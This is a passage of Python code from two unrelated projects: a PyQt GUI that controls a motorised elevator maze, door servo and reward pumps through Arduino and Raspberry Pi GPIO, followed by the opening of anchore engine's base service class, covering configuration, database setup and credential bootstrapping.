label_mode = QtGui.QLabel("Mode:")
#label_torque = QtGui.QLabel("Torque:")
label_capacitance = QtGui.QLabel("Capacitance: ") #LOOK HERE
label_capacitance.setFont(font)
self.capacitance = QtGui.QLCDNumber(self) #LOOK HERE
self.capacitance.setFont(font)
palette = QPalette()
# palette.setBrush(QtGui.QPalette.Light, QtCore.Qt.black)
brush = QtGui.QBrush(QtGui.QColor(0,0,0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
self.capacitance.setPalette(palette)
self.capacitance.setDigitCount(8)
self.threadclass = Capacitance()
self.threadclass.start()
self.connect(self.threadclass, QtCore.SIGNAL('CAP'), self.updateCapacitance)
self.capacitance.display(0) # just so something is there
# self.comboBox_task = QtGui.QComboBox()
# self.comboBox_task.addItems(["Alternating Reward Well Task", "Fixed Reward Well Task"])
# self.comboBox_task.setCurrentIndex(0)
self.lineEdit_time = QtGui.QLineEdit()
self.lineEdit_time.setMaximumSize(QtCore.QSize(100, 30))
self.lineEdit_time.setText("0")
self.lineEdit_distance = QtGui.QLineEdit()
self.lineEdit_distance.setMaximumSize(QtCore.QSize(100, 30))
self.lineEdit_distance.setText("0")
self.lineEdit_wheeldiameter = QtGui.QLineEdit()
self.lineEdit_wheeldiameter.setText("1")
self.comboBox_direction = QtGui.QComboBox()
self.comboBox_direction.addItems(["Up", "Down"])
self.comboBox_mode = QtGui.QComboBox()
self.comboBox_mode.addItems(["1/1", "1/2", "1/4", "1/8", "1/16", "1/32", "1/64", "1/128"])
self.comboBox_mode.setCurrentIndex(0)
#self.comboBox_torque = QtGui.QComboBox()
#self.comboBox_torque.addItems(["10%", "20%", "30%", "40%", "50%", "60%", "70%", "80%", "90%"])
#self.comboBox_torque.setCurrentIndex(4)
#Preset Levels >>> assign each to a 12" distance later
self.preset_checkbox = QtGui.QCheckBox("Use preset elevator levels")
self.preset_checkbox.setCheckState(False)
self.preset_checkbox.setTristate(False)
label_level = QtGui.QLabel("Level:")
self.comboBox_level = QtGui.QComboBox()
self.comboBox_level.addItems(["1", "2", "3"])
self.comboBox_level.setEnabled(False)
label_assign = QtGui.QLabel("Assign position to level?")
self.btn_assign = QtGui.QPushButton("Assign")
self.btn_assign.setEnabled(False)
self.btn_run = QtGui.QPushButton("Run")
self.btn_doorstat = QtGui.QPushButton("Open/Close")
self.progress_bar = QtGui.QProgressBar()
self.btn_doorstat = QtGui.QPushButton("Open/Close")
label_history = QtGui.QLabel("Command History")
label_history.setFont(font)
self.command_history = QtGui.QPlainTextEdit()
self.command_history.setMaximumSize(QtCore.QSize(1000, 500))
self.command_history.setReadOnly(True)
self.command_history.appendPlainText("Note: The speed will be scaled according to the microstepping mode.")
self.command_history.appendPlainText("Note: The time and distance inputs must be positive integers. Numbers that are not integers will be rounded down.")
self.command_history.appendPlainText("")
font = QtGui.QFont("Helvetica", 12)
label_instructions = QtGui.QLabel("Please visit the following site for instructions:")
label_instructions.setFont(font)
label_website = QtGui.QLabel()
label_website.setFont(font)
label_website.setText("<a href=\"https://github.com/kemerelab/Elevator/\">Elevator Maze</a>")
label_website.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
label_website.setOpenExternalLinks(True)
# Format UI elements
formLayout = QtGui.QFormLayout()
formLayout.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
formLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
formLayout.addRow(label_time, self.lineEdit_time)
formLayout.addRow(label_steps, self.lineEdit_distance)
formLayout.addRow(label_direction, self.comboBox_direction)
formLayout.addRow(label_mode, self.comboBox_mode)
#formLayout.addRow(label_torque, self.comboBox_torque)
formLayout.addRow(label_wheeldiameter, self.lineEdit_wheeldiameter)
formLayout2 = QtGui.QFormLayout()
formLayout2.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
formLayout2.setLabelAlignment(QtCore.Qt.AlignLeft)
formLayout2.addRow(label_level, self.comboBox_level)
formLayout2.addRow(label_capacitance, self.capacitance) #LOOK HERE
verticalLayout = QtGui.QVBoxLayout()
verticalLayout.addWidget(self.preset_checkbox)
verticalLayout.addLayout(formLayout2)
verticalLayout.addStretch()
verticalLayout.addWidget(label_assign)
verticalLayout.addWidget(self.btn_assign, 0, QtCore.Qt.AlignHCenter)
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.addLayout(formLayout)
horizontalLayout.addSpacerItem(columnSpacer)
horizontalLayout.addLayout(verticalLayout)
verticalLayout2 = QtGui.QVBoxLayout(self)
verticalLayout2.setContentsMargins(30, 20, 30, 20)
verticalLayout2.setSizeConstraint(QtGui.QLayout.SetFixedSize)
verticalLayout2.addWidget(label_banner, 0, QtCore.Qt.AlignHCenter)
verticalLayout2.addSpacerItem(rowSpacer)
verticalLayout2.addWidget(label_motorState)
verticalLayout2.addLayout(horizontalLayout)
verticalLayout2.addWidget(self.btn_run, 0, QtCore.Qt.AlignHCenter)
verticalLayout2.addWidget(self.btn_doorstat, 0, QtCore.Qt.AlignRight)
verticalLayout2.addWidget(self.progress_bar)
verticalLayout2.addSpacerItem(rowSpacer)
formLayout3 = QtGui.QFormLayout()
verticalLayout2.addLayout(formLayout3)
formLayout3.addRow(label_capacitance, self.capacitance) #LOOK HERE
verticalLayout2.addWidget(label_history)
verticalLayout2.addWidget(self.command_history)
verticalLayout2.addSpacerItem(rowSpacer)
verticalLayout2.addWidget(label_instructions)
verticalLayout2.addWidget(label_website)
self.btn_run.clicked.connect(self.collectMotorData)
self.btn_doorstat.clicked.connect(self.sendServoData)
self.preset_checkbox.stateChanged.connect(self.updateUI)
self.comboBox_level.currentIndexChanged.connect(self.updateUI)
self.btn_assign.clicked.connect(self.assignPosition)
self.btn_assign.clicked.connect(self.updateUI)
def updateCapacitance(self, val):
self.capacitance.display(val)
def calculateSteps (self):
"""
Distance to be traveled divided by the circumference of the wheel (distance
covered in one rotation) and multiplied by 200 (number of steps in one
rotation of the stepper) in order to find number of steps that need to be
taken to reach desired location.
"""
print(float(self.lineEdit_distance.text()))
self.steppersteps = (float(self.lineEdit_distance.text()) / (math.pi * float(self.lineEdit_wheeldiameter.text()))) * (200 * float(self.comboBox_mode.currentText()[2:]))
print(self.steppersteps)
return self.steppersteps
def delay(self):
"""
Total time for a level change divided by 2 times the number of steps
required to get the desired distance change (to account for rests between
steps) and the mode (to account for microstepping).
"""
#Delay times are approximations as the steps will be rounded later
self.delaytime = float(self.lineEdit_time.text()) / (2 * float(self.steppersteps))
self.delaytime *= 1000
print("delay:", self.delaytime)
return self.delaytime
def reqRPM(self):
"""
Find RPM based off of number of steps needed to move a desired distance
times mode, and divided by 200
"""
reqspeed = (self.steppersteps)/(200 * int(self.comboBox_mode.currentText()[2:]))
reqspeed_valid = True
if reqspeed > 200 or reqspeed < 0:
reqspeed_valid = False
print(reqspeed)
return reqspeed, reqspeed_valid
def collectMotorData(self):
#speed, speed_valid = QtCore.QString.toFloat(self.lineEdit_speed.text())
#torque = str(self.comboBox_torque.currentText()[0])
# If preset levels are used, calculate steps and direction
#### NEEDS TO BE REDONE********
#Not using preset levels
if self.preset_checkbox.checkState() == 2:
steps_valid = True
steps, direction = self.level_calculations()
else:
#steps, steps_valid = QtCore.QString.toFloat(self.lineEdit_distance.text())
steps = int(self.calculateSteps())
direction = str(self.comboBox_direction.currentText())
if direction == "Up" and steps >= maxHeight - self.currentPosition:
steps_valid = True
elif direction == 'Down' and steps <= self.currentPosition - minHeight:
steps_valid = True
else:
steps_valid = False
speed, speed_valid = self.reqRPM()
stepdelay = self.delay()
#if speed_valid == False or steps_valid == False:
# self.errorMessage(0)
#if speed == 0 and speed_valid == True:
# self.errorMessage(1)
#if speed > 200 or speed < 0:
# self.errorMessage(2)
#self.level_position(2)
# speed = 0
# steps = 0
#speed = int(speed)
#if(speed != 0):
#if steps == 0 and steps_valid == True:
#if self.preset_checkbox.checkState() == 0:
# self.errorMessage(3)
#if self.preset_checkbox.checkState() == 2:
# self.errorMessage(6)
#if steps < 0:
# self.errorMessage(8)
# steps = 0
#steps = int(steps)
# Do not step past the top and bottom of the maze
if direction == "Up" and speed != 0:
if steps > maxHeight - self.currentPosition:
self.errorMessage(4)
steps = maxHeight - self.currentPosition
self.currentPosition += int(steps)
if direction == "Down" and speed != 0:
if steps > self.currentPosition - minHeight:
self.errorMessage(5)
steps = self.currentPosition - minHeight
self.currentPosition -= int(steps)
# Using a microstepping mode of 1/2, for example, halves the number of steps
# Multiply the number of steps by the reciprocal of the mode
# This will not affect position tracking as it occurs after position tracking
#print (mode)
self.sendMotorData(str(speed), str(int(self.steppersteps)), self.comboBox_mode.currentText()[2:], direction, str(stepdelay))
def sendMotorData(self, speed, steps, mode, direction, delay):
self.btn_run.setEnabled(False)
#while len(speed) < 4:
# speed = "0" + speed
#while len(steps) < 8:
# steps = "0" + steps
#while len(mode) < 3:
# mode = "0" + mode
#while len(delay) < 6:
# delay = "0" + delay
data = str('x'+speed+'x'+steps+'x'+mode+'x'+delay+'x'+direction)
print("stepper data:", data)
self.command_history.appendPlainText(data)
self.command_history.appendPlainText("Estimated time required (seconds): " + self.lineEdit_time.text())
# self.sendServoData()
try:
arduino.write(data)
self.update_progress(int(self.steppersteps))
#arduino.write("On")
# In a separate thread, block new inputs until Arduino is ready
#if self.steps != 0:
#self.progress_bar.setRange(0, self.steps)
#self.motor_progress = update_thread(self.steps)
#self.motor_progress.start()
#self.motor_progress.bar_value.connect(self.update_progress)
#else:
#self.update_progress(0)
except:
self.command_history.appendPlainText("The Arduino is not connected.")
self.btn_run.setEnabled(True)
#### I think hall effect sensor reading should go here
self.command_history.appendPlainText("Current position: " + str(self.currentPosition))
self.command_history.appendPlainText("")
def sendServoData(self):
if globalvars.doorclose:
try:
arduinoservodoor.write("0")
globalvars.doorclose = not globalvars.doorclose
if(globalvars.doorclose):
print("Door Closed")
else:
print("Door Open")
if(arduinoCapSense is not None):
target.write("door open\n")
except:
self.command_history.appendPlainText("Error reading from servo arduino\n")
else:
try:
arduinoservodoor.write("90")
globalvars.doorclose = not globalvars.doorclose
if(globalvars.doorclose):
print("Door Closed")
else:
print("Door Open")
try:
#while True:
if(arduinoCapSense is not None):
arduinoCapSense.flushInput()
capdata = arduinoCapSense.readline()
target.write(capdata)
target.write("door closed\n")
#target.write("\n")
print capdata
#values = line.decode('ascii').split(':')
#print arduinoCapSense.readline()
#print (values)
# time.sleep(0.001)
#for byte in arduinoCapSense.read():
#print(ord(byte))
#byte_range = bytearray(b'\x85W\xe2\xa2I')
#date_header = struct.unpack('>BL', byte_range)
except:
self.command_history.appendPlainText("Error writing to capacitive sensor arduino\n")
except:
self.command_history.appendPlainText("Error writing to servo arduino\n")
def level_calculations(self):
# This method is called in collectMotorData() and updateUI()
current_level = int(self.comboBox_level.currentText())
#self.emit(QtCore.SIGNAL('LEVEL'), current_level)
steps = abs(self.currentPosition - self.level_position[current_level])
if self.currentPosition > self.level_position[current_level]:
direction = "Down"
else:
direction = "Up"
return steps, direction
def assignPosition(self):
# Reassign elevator levels if necessary
current_level = int(self.comboBox_level.currentText())
difference = self.currentPosition - self.level_position[current_level]
if difference != 0:
for level in self.level_position.keys():
self.level_position[level] += difference
self.command_history.appendPlainText("New level positions:")
else:
self.errorMessage(7)
self.command_history.appendPlainText("Current level positions:")
self.command_history.appendPlainText("Level 1: " + str(self.level_position[1]))
self.command_history.appendPlainText("Level 2: " + str(self.level_position[2]))
self.command_history.appendPlainText("Level 3: " + str(self.level_position[3]))
self.command_history.appendPlainText("")
def updateUI(self):
steps, direction = self.level_calculations()
# If preset levels are used, disable corresponding manual inputs
if self.preset_checkbox.checkState() == 0:
self.lineEdit_distance.setEnabled(True)
self.lineEdit_distance.setText("0")
self.comboBox_direction.setEnabled(True)
self.comboBox_level.setEnabled(False)
self.btn_assign.setEnabled(False)
if self.preset_checkbox.checkState() == 2:
self.lineEdit_distance.setEnabled(False)
self.lineEdit_distance.setText(str(steps))
self.comboBox_direction.setEnabled(False)
if direction == "Up":
self.comboBox_direction.setCurrentIndex(0)
else:
self.comboBox_direction.setCurrentIndex(1)
self.comboBox_level.setEnabled(True)
self.btn_assign.setEnabled(True)
def errorMessage(self, num):
invalid_box = QtGui.QMessageBox()
invalid_box.setIcon(QtGui.QMessageBox.Warning)
if num == 0:
invalid_box.setText("<br>Invalid input(s).")
invalid_box.setInformativeText("<big>Inputs must be numbers.")
if num == 1:
invalid_box.setText("<br>The speed has not been set.")
invalid_box.setInformativeText("<big>Please set a speed to start the motor.")
if num == 2:
invalid_box.setText("<br>The speed cannot be set.")
invalid_box.setInformativeText("<big>The speed must be greater than 0 but less than the maximum RPM of 150. The steps have been set to 0. Please try again at a lower speed.")
if num == 3:
invalid_box.setText("<br>The distance has not been set.")
invalid_box.setInformativeText("<big>Please set a distance to start the motor.")
if num == 4:
invalid_box.setText("<br>Distance exceeds maze height.")
invalid_box.setInformativeText("<big>The elevator will stop at the top of the maze.")
if num == 5:
invalid_box.setText("<br>Distance exceeds bottom of maze.")
invalid_box.setInformativeText("<big>The elevator will stop at the bottom of the maze.")
if num == 6:
invalid_box.setText("<br>The distance cannot be set.")
invalid_box.setInformativeText("<big>The elevator is already on this level.")
if num == 7:
invalid_box.setText("<br>The levels cannot be assigned.")
invalid_box.setInformativeText("<big>This level is already assigned to the current position.")
if num == 8:
invalid_box.setText("<br>The distance cannot be set.")
invalid_box.setInformativeText("<big>The number of steps must be greater than 0.")
invalid_box.exec_()
def update_progress(self, num):
self.progress_bar.setValue(num)
#self.btn_run.setText(str(num) + "/" + str(int(self.steppersteps)))
# Allow new input when motor is done stepping
if num == int(self.steppersteps):
self.btn_run.setText("Run")
self.btn_run.setEnabled(True)
self.progress_bar.reset()
#if self.preset_checkbox.checkState() == 2:
self.updateUI()
class update_thread(QtCore.QThread):
bar_value = QtCore.pyqtSignal(int)
def __init__(self, steps):
super(update_thread, self).__init__()
self.steps = steps
def run(self):
# Track steps completed by reading serial port
all_entries = []
step_entry = []
lencount = len(all_entries)
count = 0
while len(all_entries) < self.steps:
if lencount == len(all_entries):
count += 1
if count > 5:
self.bar_value.emit(self.steps)
break
lencount = len(all_entries)
for byte in arduino.read():
count = 0
#print (byte)
step_entry.append(byte)
#print (step_entry)
#length of previous all_entries
#compare to current length
#if value is same increment counter
#update lencount
if byte == '\n':
all_entries.append(step_entry)
#print(all_entries)
self.bar_value.emit(len(all_entries))
step_entry = []
#print (len(all_entries),"moo", count)
class level(QtCore.QThread): #shows what level we are on and will run the reward wells
def run (self):
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
checker1 = 1
checker2 = 0
trigger1 = 26
pump1 = 13
trigger2 = 21
pump2 = 16
GPIO.setup(pump1, GPIO.OUT)
GPIO.setup(trigger1, GPIO.IN)
GPIO.setup(pump2, GPIO.OUT)
GPIO.setup(trigger2, GPIO.IN)
#for outputs, 0 enables pump and 1 turns it off
while True:
if GPIO.input(trigger1) == True and checker1 == 1:
GPIO.output(pump1, 0)
print "triggering reward! :)"
time.sleep(5)
GPIO.output(pump1,1)
checker1 = 0
checker2 = 1
else:
GPIO.output(pump2,1)
if GPIO.input(trigger2) == True and checker2 == 1:
GPIO.output(pump2, 0)
print "triggering reward again! :)"
time.sleep(5)
GPIO.output(pump2,1)
checker2 = 0
checker1 = 1
else:
GPIO.output(pump1,1)
class receiving(QtCore.QThread):
def run(self):
UDP_IPr = "127.0.0.1"
UDP_PORTr = 5005
sockr = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
sockr.bind((UDP_IPr, UDP_PORTr))
while True:
data, addr = sockr.recvfrom(1024) # buffer size is 1024 bytes
data = float (data)
self.emit(QtCore.SIGNAL('CAP'), data)
#def collectServoData(self, q):
# doorclose = self.doorclose
# q.put(doorclose)
def callPiCamDisplay():
os.system('python PiCamDisplay.py')
#def callRewardWell1():
# os.system('python RewardWellLevel1.py')
#def callRewardWell2():
# os.system('python RewardWellLevel2.py')
#def callRewardWell3():
# os.system('python RewardWellLevel3.py')
#def callRewardWell():
#os.system('python RewardWell.py')
def callRewardWells():
HIGH = 0
LOW = 1
# doorclose = Event()
# if not obj:
# doorclose.set()
# elif obj:
# doorclose.clear()
# print obj
# print doorclose
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
wellnum = 0
### NO NEED FOR CHECKERS ANYMORE WITH NEW TASK
checker1 = 1
# checker2 = 1
# checker3 = 1
checker4 = 1
# checker5 = 1
# checker6 = 1
trigger1 = 15
pump1 = 17
# trigger2 = 18
# pump2 = 22
# trigger3 = 23 #might cause an error, 4 or 04
# pump3 = 10 #might cause an error, 2 or 02
trigger4 = 24
pump4 = 11
# trigger5 = 25
# pump5 = 13
# trigger6 = 8
# pump6 = 26
cap_resetpin = 21
GPIO.setup(cap_resetpin, GPIO.OUT)
GPIO.setup(pump1, GPIO.OUT)
GPIO.setup(trigger1, GPIO.IN)
# GPIO.setup(pump2, GPIO.OUT)
# GPIO.setup(trigger2, GPIO.IN)
# GPIO.setup(pump3, GPIO.OUT)
# GPIO.setup(trigger3, GPIO.IN)
GPIO.setup(pump4, GPIO.OUT)
GPIO.setup(trigger4, GPIO.IN)
# GPIO.setup(pump5, GPIO.OUT)
# GPIO.setup(trigger5, GPIO.IN)
# GPIO.setup(pump6, GPIO.OUT)
# GPIO.setup(trigger6, GPIO.IN)
#for outputs, 0 enables pump and 1 turns it off
GPIO.output(pump1, LOW)
# # GPIO.output(pump2, LOW)
# GPIO.output(pump3, LOW)
GPIO.output(pump4, LOW)
# GPIO.output(pump5, LOW)
# GPIO.output(pump6, LOW)
GPIO.output(cap_resetpin, LOW)
while globalvars.quitThread == False:
#print obj
time.sleep(0.05)
if globalvars.doorclose:
# doorclose.set()
if wellnum == 1:
# checker2 = 1
wellnum = 0
#print checker2
elif wellnum == 2:
# checker1 = 1
wellnum = 0
#print checker1
elif wellnum == 3:
# checker4 = 1
wellnum = 0
#print checker4
elif wellnum == 4:
# checker3 = 1
wellnum = 0
#print checker3
# elif wellnum == 5:
# checker6 = 1
# wellnum = 0
# #print checker6
# elif wellnum == 6:
# checker5 = 1
# wellnum = 0
# #print checker5
elif not globalvars.doorclose and wellnum == 0:
# doorclose.clear()
trig1input = GPIO.input(trigger1)
#print(trig1input)
trig2input = GPIO.input(trigger2)
#print(trig2input)
if trig1input == True and checker1 == 1:
GPIO.output(pump1, HIGH)
GPIO.output(cap_resetpin, HIGH)
print "triggering reward! :) 1"
checker2 = 0
time.sleep(1)
GPIO.output(pump1, LOW)
GPIO.output(cap_resetpin, LOW)
checker1 = 0
wellnum = 1
# print checker2
# doorclose.wait()
checker2 = 1
print checker2
elif trig2input == True and checker2 == 1:
GPIO.output(pump2, HIGH)
GPIO.output(cap_resetpin, HIGH)
print "triggering reward! :) 2"
checker1 = 0
time.sleep(1)
GPIO.output(pump2, LOW)
GPIO.output(cap_resetpin, LOW)
checker2 = 0
wellnum = 2
# print checker1
print wellnum
# doorclose.wait()
checker1 = 1
# print checker1
elif GPIO.input(trigger3) == True and checker1 == 3:
GPIO.output(pump3, HIGH)
GPIO.output(cap_resetpin, HIGH)
print "triggering reward! :) 3"
checker4 = 0
time.sleep(1)
GPIO.output(pump3, LOW)
GPIO.output(cap_resetpin, LOW)
checker3 = 0
wellnum = 3
print wellnum
# print checker4
# doorclose.wait()
checker4 = 1
# print checker4
elif GPIO.input(trigger4) == True and checker4 == 1:
GPIO.output(pump4, HIGH)
GPIO.output(cap_resetpin, HIGH)
print "triggering reward! :) 4"
checker3 = 0
time.sleep(1)
GPIO.output(pump4, LOW)
GPIO.output(cap_resetpin, LOW)
checker4 = 0
wellnum = 4
# print checker3
# doorclose.wait()
checker3 = 1
print checker3
# elif GPIO.input(trigger5) == True and checker5 == 1:
# GPIO.output(pump5, HIGH)
# GPIO.output(cap_resetpin, HIGH)
# print "triggering reward! :) 5"
# checker6 = 0
# time.sleep(1)
# GPIO.output(pump5, LOW)
# GPIO.output(cap_resetpin, LOW)
# checker5 = 0
# wellnum = 5
# # print checker6
# # doorclose.wait()
# checker6 = 1
# print checker6
# elif GPIO.input(trigger6) == True and checker6 == 1:
# GPIO.output(pump6, HIGH)
# GPIO.output(cap_resetpin, HIGH)
# print "triggering reward! :) 6"
# checker5 = 0
# time.sleep(1)
# GPIO.output(pump6, LOW)
# GPIO.output(cap_resetpin, LOW)
# checker6 = 0
# wellnum = 6
# # print checker5
# # doorclose.wait()
# checker5 = 1
# print checker5
t2 = Thread(target = callRewardWells, args = ())
if __name__ == '__main__':
# p = multiprocessing.Process(target = callPiCamDisplay)
# p.start()
#time.sleep(5)
#os.kill(p.pid, signal.SIGKILL)
# q = multiprocessing.Process(target = callRewardWell1)
# q.start()
# w = multiprocessing.Process(target = callRewardWell2)
# w.start()
# e = multiprocessing.Process(target = callRewardWell3)
# e.start()
#global doorclose
globalvars.doorclose = True
#print globalvars.doorclose in globals()
#print "It's okay if it's false b/c you have import access to it"
app = QtGui.QApplication(sys.argv)
ex = Ui_Form()
ex.show()
ex.raise_()
# q = Queue.Queue()
# t1 = Thread(target = collectServoData, args = (ex.doorclose))
#t2 = Thread(target = callRewardWells, args = ())
# t1.start()
t2.start()
t = time.time()
elapsed = time.time() - t
while elapsed < (60 * 60):
arduino.write("x3.81971863421x97784x128x0.0153398078789xUp")
arduino.write("x3.18309886184e-08x0x1x235619449.019xUp")
time.sleep(15)
arduino.write("x3.81971863421x97784x128x0.0153398078789xDown")
arduino.write("x3.18309886184e-08x0x1x235619449.019xUp")
time.sleep(15)
elapsed = time.time() - t
# ex.raise_()
sys.exit(app.exec_())
#target.close()
#print "closed!"
# t1.join()
#t2.join()
|
service.py
|
"""
Base types for all anchore engine services
"""
import copy
import connexion
import enum
from flask import g, jsonify
import json
import os
from pathlib import Path
import yaml
import time
import threading
import traceback
from anchore_engine.configuration import localconfig
from anchore_engine.subsys import logger, metrics, servicestatus, taskstate
from anchore_engine import monitors
from anchore_engine.db import db_services, session_scope, initialize as initialize_db
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.apis.authorization import init_authz_handler, get_authorizer
from anchore_engine.subsys.events import ServiceAuthzPluginHealthCheckFail
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services.catalog import CatalogClient
from anchore_engine.configuration.localconfig import OauthNotConfiguredError, InvalidOauthConfigurationError
from anchore_engine.apis.exceptions import AnchoreApiError
from anchore_engine.common.helpers import make_response_error
class LifeCycleStages(enum.IntEnum):
"""
Ordered lifecycle stages by execution order
"""
pre_config = 0
post_config = 1
pre_db = 2
post_db = 3
pre_credentials = 4
post_credentials = 5
pre_bootstrap = 6
post_bootstrap = 7
pre_register = 8
post_register = 9
# Default handlers set at system level, will be modified by instantiation of BaseService at instance-level
_default_lifecycle_handlers = {
LifeCycleStages.pre_config: [],
LifeCycleStages.post_config: [],
LifeCycleStages.pre_db: [],
LifeCycleStages.post_db: [],
LifeCycleStages.pre_credentials: [],
LifeCycleStages.post_credentials: [],
LifeCycleStages.pre_bootstrap: [],
LifeCycleStages.post_bootstrap: [],
LifeCycleStages.pre_register: [],
LifeCycleStages.post_register: []
}
def handle_api_exception(ex: AnchoreApiError):
"""
Returns the proper json for marshalling an AnchoreApiError
:param ex:
:return:
"""
return jsonify(make_response_error(ex.message, in_httpcode=ex.__response_code__, details=ex.detail if ex.detail else {})), ex.__response_code__
class ServiceMeta(type):
"""
Metaclass to create a registry for all subclasses of Gate for finding, building, and documenting the services
"""
def __init__(cls, name, bases, dct):
if not hasattr(cls, 'registry'):
cls.registry = {}
else:
if '__service_name__' in dct:
svc_id = dct['__service_name__'].lower()
cls.registry[svc_id] = cls
super(ServiceMeta, cls).__init__(name, bases, dct)
def get_service_by_name(cls, name):
# Try direct name
found = cls.registry.get(name.lower())
if found:
return found
else:
raise KeyError(name)
def registered_service_types(cls):
return list(cls.registry.keys())
class BaseService(object, metaclass=ServiceMeta):
"""
Base type for all services to inherit from.
An anchore engine service always has:
healthcheck api - GET /health responds with 200 OK.
monitor thread - to schedule async tasks and handle service status updates upstream
versioned api - /vX/...
Services have similar bootstrap and initialization path:
self.configure() - load config
self.db_connect() - setup db connections
self.credential_init() - load system credentials
self.bootstrap() - service-specific bootstrap that involves db and maybe other services
self.register() - register the service in the db for discoverability
These are all invoked in order from the bootstrap() function directly.
Class variables:
__is_unique_service__ = determines whether the system should allow more than one of this service instance to be registered.
__service_name__ = The name used to identify this service class in both the service records and in config.
__db_enabled__ = True|False determines if this service depends on the db and should connnect (default = True)
__monitors__ = Dict of monitor configurations for this service
__monitor_fn__ = Function to invoke as base thread monitor
__service_api_version__ = str version name to use as prefix for api calls: e.g. /<__service_api_version__>/images
__lifecycle_handlers__ = dict of mappings from LifeCycleStages to (function, arg) pairs to merge into the global defaults on instantiation
"""
__is_unique_service__ = False
__service_name__ = None
__db_enabled__ = True
__monitors__ = {}
__monitor_fn__ = monitors.monitor
__service_api_version__ = 'v1'
__lifecycle_handlers__ = {}
__require_system_user__ = True
__task_handlers_enabled__ = True
def __init__(self, options=None):
self.name = self.__service_name__
self.options = options if options is not None else {}
self.global_configuration = None
self.requires_db = None
self.require_system_user = self.__require_system_user__
self.lifecycle_handlers = copy.deepcopy(_default_lifecycle_handlers)
self.lifecycle_handlers.update(self.__lifecycle_handlers__)
self.instance_id = None
self.versions = None
self.configuration = None
self.fq_name = None
self.monitor_fn = self.__monitor_fn__
self.monitor_kwargs = {}
self.monitor_threads = {}
self.service_record = {}
self.task_handlers_enabled = self.__task_handlers_enabled__
@property
def is_enabled(self):
if self.configuration:
return self.configuration.get('enabled', False)
else:
return False
def _register_instance_handlers(self):
"""
Called before the bootstrap process is initiated to allow overriding classes to modify the handlers
:return:
"""
return
def _process_stage_handlers(self, stage):
logger.info('Processing init handlers for bootsrap stage: {}'.format(stage.name))
handlers = self.lifecycle_handlers.get(stage, [])
logger.debug('Executing {} stage {} handlers'.format(len(handlers), stage.name))
for handler_fn, handler_args in handlers:
try:
logger.debug('Invoking handler: {} with args {}'.format(handler_fn.__name__, handler_args))
if handler_args is not None:
handler_fn(*handler_args)
else:
handler_fn()
logger.debug('Handler: {} completed successfully'.format(handler_fn.__name__, handler_args))
except Exception as ex:
logger.exception('Pre-Stage Handler {} for service pre_config raised exception'.format(handler_fn.__name__))
raise ex
def register_handler(self, stage, handler_fn, handler_args=None):
"""
Register handlers for specific lifecycle stages
:param stage: LifeCycleState enum obj to register for
:param handler_fn: function to invoke
:param handler_args: list of arguments to pass to the handler in order handler_fn(*handler_args)
:return:
"""
assert isinstance(stage, LifeCycleStages)
if stage in self.lifecycle_handlers:
self.lifecycle_handlers[stage].append((handler_fn, handler_args))
else:
raise KeyError(stage)
def _get_service_configuration(self, global_config):
"""
Extract service config from the global config.
Override or supplement this function if a service needs configuration that isn't strictly in its 'service' entry.
Should be a very rare occurance.
:param global_config:
:return: service configuration for this service
"""
assert(self.__service_name__ in global_config['services'])
return global_config['services'][self.__service_name__]
def configure(self):
self._process_stage_handlers(LifeCycleStages.pre_config)
self._configure()
self._process_stage_handlers(LifeCycleStages.post_config)
def _configure(self):
"""
Load service configuration
:return:
"""
logger.info('Loading and initializing global configuration')
self.configuration = self._get_service_configuration(self.global_configuration)
self.instance_id = localconfig.get_host_id()
self.fq_name = (self.name, self.instance_id)
# get versions of things
try:
self.versions = localconfig.get_versions()
except Exception as err:
logger.error('cannot detect versions of service: exception - ' + str(err))
raise err
self.task_handlers_enabled = self.configuration.get('task_handlers_enabled', True)
env_setting = not os.environ.get('ANCHORE_ENGINE_DISABLE_MONITORS', 'false').lower() == 'true'
self.task_handlers_enabled = self.task_handlers_enabled and env_setting
if not self.task_handlers_enabled:
if env_setting:
logger.warn('Task handlers disabled by setting ANCHORE_ENGINE_DISABLE_MONITORS in environment')
else:
logger.warn('Task handlers disabled by configuration file value')
try:
kick_timer = int(self.configuration['cycle_timer_seconds'])
except:
kick_timer = 1
try:
cycle_timers = {}
cycle_timers.update(self.configuration['cycle_timers'])
except:
cycle_timers = {}
self.monitor_kwargs['kick_timer'] = kick_timer
self.monitor_kwargs['cycle_timers'] = cycle_timers
self.monitor_kwargs['monitors'] = copy.deepcopy(self.__monitors__)
self.monitor_kwargs['monitor_threads'] = self.monitor_threads
self.monitor_kwargs['servicename'] = self.name
logger.info('Configuration complete')
def db_connect(self):
self._process_stage_handlers(LifeCycleStages.pre_db)
self._db_connect()
self._process_stage_handlers(LifeCycleStages.post_db)
def _db_connect(self):
"""
Initialize the db connection and prepare the db
:return:
"""
logger.info('Configuring db connection')
if not self.db_connect:
logger.info('DB Connection disabled in configuration for service {}. Skipping db init'.format(self.__service_name__))
return True
logger.info('Initializing database')
# connect to DB
try:
initialize_db(localconfig=self.global_configuration, versions=self.versions)
except Exception as err:
logger.error('cannot connect to configured DB: exception - ' + str(err))
raise err
logger.info('DB connection initialization complete')
def credential_init(self):
self._process_stage_handlers(LifeCycleStages.pre_credentials)
self._credential_init()
self._process_stage_handlers(LifeCycleStages.post_credentials)
def _credential_init(self):
logger.info('Bootstrapping credentials')
# credential bootstrap
self.global_configuration['system_user_auth'] = (None, None)
if self.require_system_user:
gotauth = False
max_retries = 60
self.global_configuration['system_user_auth'] = (None, None)
for count in range(1, max_retries):
try:
with session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
logger.info('Checking system creds')
c = mgr.get_system_credentials()
if c is not None:
logger.info('Found valid system creds')
gotauth = True
break
else:
logger.info('Did not find valid system creds')
logger.error('cannot get system user auth credentials yet, retrying (' + str(count) + ' / ' + str(max_retries) + ')')
time.sleep(5)
except InvalidOauthConfigurationError:
raise
except Exception as err:
